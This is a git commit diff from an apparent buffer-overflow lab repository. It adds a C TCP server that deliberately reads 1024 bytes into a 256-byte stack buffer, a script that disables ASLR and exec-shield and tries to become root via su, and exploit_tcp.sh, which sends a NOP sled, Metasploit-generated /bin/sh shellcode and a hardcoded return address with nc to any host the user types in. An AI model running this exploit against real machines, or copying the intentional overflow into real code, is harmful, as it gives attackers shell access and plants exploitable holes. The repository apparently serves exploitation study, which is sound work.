diff options
| -rw-r--r-- | .gitignore | 2 | ||||
| -rwxr-xr-x | disable_prot.sh | 6 | ||||
| -rwxr-xr-x | exploit_tcp.sh | 11 | ||||
| -rwxr-xr-x | overflow | bin | 3344 -> 0 bytes | |||
| -rw-r--r-- | overflow_tcp.c | 66 |
5 files changed, 84 insertions, 1 deletions
diff --git a/.gitignore b/.gitignore new file mode 100644 index 0000000..bbffc50 --- /dev/null +++ b/.gitignore @@ -0,0 +1,2 @@ +overflow +overflow_tcp diff --git a/disable_prot.sh b/disable_prot.sh index 16498a3..15e8137 100755 --- a/disable_prot.sh +++ b/disable_prot.sh @@ -1,9 +1,13 @@ -#!/bin/sh +#!/bin/bash if [ `id -u` -ne 0 ]; then echo "$0: This program should be run as root" + echo "$0: Try to get root .." + su -l root -c "$(realpath $0)" + exit $? fi sysctl -w kernel.randomize_va_space=0 2>/dev/null sysctl -w kernel.exec-shield=0 2>/dev/null +echo "done." diff --git a/exploit_tcp.sh b/exploit_tcp.sh new file mode 100755 index 0000000..4630887 --- /dev/null +++ b/exploit_tcp.sh @@ -0,0 +1,11 @@ +#!/bin/sh + +# shellcode generated with metasploit (exec /bin/sh): +# ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20' + +# 117xNOP (0x90) + shellcode + 117xNOP (0x90) + return addr +#[*] Exact match at offset 284 + + +read -p "Target: " host +python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"' | nc -q 0 "$host" 3000 diff --git a/overflow b/overflow Binary files differdeleted file mode 100755 index 1879d46..0000000 --- a/overflow +++ /dev/null diff --git a/overflow_tcp.c b/overflow_tcp.c new file mode 100644 index 0000000..cafeaec --- /dev/null +++ b/overflow_tcp.c @@ -0,0 +1,66 @@ +#include <stdlib.h> +#include <stdio.h> +#include <sys/types.h> +#include <sys/socket.h> +#include <sys/wait.h> +#include <netinet/in.h> +#include <string.h> +#include <unistd.h> +#include <signal.h> + +#define MAXLINE 1024 +#define BUFLEN 256 +#define SERV_PORT 3000 +#define LISTENQ 8 + +int main (int argc, char **argv) +{ + int listenfd, connfd, n, line = 0, status; + pid_t childpid, w; + socklen_t clilen; + char buf[BUFLEN]; + struct sockaddr_in cliaddr, servaddr; + + if ((listenfd = socket(AF_INET, SOCK_STREAM, 0)) <0) { + perror("socket"); + exit(1); + } + + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = htonl(INADDR_ANY); + servaddr.sin_port = htons(SERV_PORT); + + if (bind(listenfd, (struct sockaddr *) &servaddr, sizeof(servaddr)) != 0) { + perror("bind"); + exit(2); + } + if (listen(listenfd, LISTENQ) != 0) { + perror("listen"); + exit(3); + } + + fprintf(stderr, "Server running on port %d ...\n", SERV_PORT); + for (;;) { + memset(buf, 0, BUFLEN); + clilen = sizeof(cliaddr); + connfd = accept (listenfd, (struct sockaddr *) &cliaddr, &clilen); + if (connfd < 0) break; + fprintf(stderr, "Client connected.\n"); + if ((childpid = fork ()) == 0 ) { + while ((n = recv(connfd, buf, MAXLINE,0)) > 0) { + fprintf(stderr, "[%d] Received string(%d): %s", line, n, buf); + memset(buf, 0, BUFLEN); + line++; + } + exit(1); + } + if ((w = wait(&status))) { + if (WIFEXITED(status)) { + kill(w, SIGCHLD); + } + } + } + + close(listenfd); + return (0); +} |